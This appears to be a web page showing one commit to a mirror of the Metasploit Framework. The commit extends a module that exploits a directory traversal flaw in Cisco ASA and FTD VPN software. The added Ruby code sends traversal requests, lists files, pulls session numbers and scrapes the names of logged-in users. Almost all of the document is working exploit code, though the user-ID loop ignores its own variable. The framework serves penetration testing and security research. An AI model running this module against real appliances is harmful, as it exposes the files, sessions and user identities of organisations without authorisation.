infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

listing files and grabbing logged in user names

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-31 16:03:17 -05:00
parent ca8a01d27c
commit 021264fd5a
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 25 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
modules/auxiliary/scanner/http/cisco_directory_traversal.rb
View File

@ -12,6 +12,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco ASA Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
It enumerates the contents of Cisco's VPN service which includes directories, files, and currently logged in users
},
'Author' => [ 'Michał Bentkowski', # Discovery
'Yassine Aboukir', # PoC
@ -64,9 +65,32 @@ class MetasploitModule < Msf::Auxiliary
'uri' => cscoe_uri
)
if file_res && sessions_res && cscoe_res
if file_res
print_good(file_res.body)
end
if sessions_res
print_good(sessions_res.body)
session_no = sessions_res.body.match('([0-9]{2,})')
fail_with(Failure::BadConfig, 'Could not grab a session') if session_no.nil?
this_res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, sessions_uri, session_no))
if this_res && this_res.body.include?('name')
print_good(this_res.body)
user_ids = this_res.body.scan(/user:(\w+)/)
print_good(user_ids)
user_ids.each do |id|
id_res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/', 'app_index.html'))
if id_res
print_good(id_res.body)
end
end
end
end
if cscoe_res
print_good(cscoe_res.body)
end
end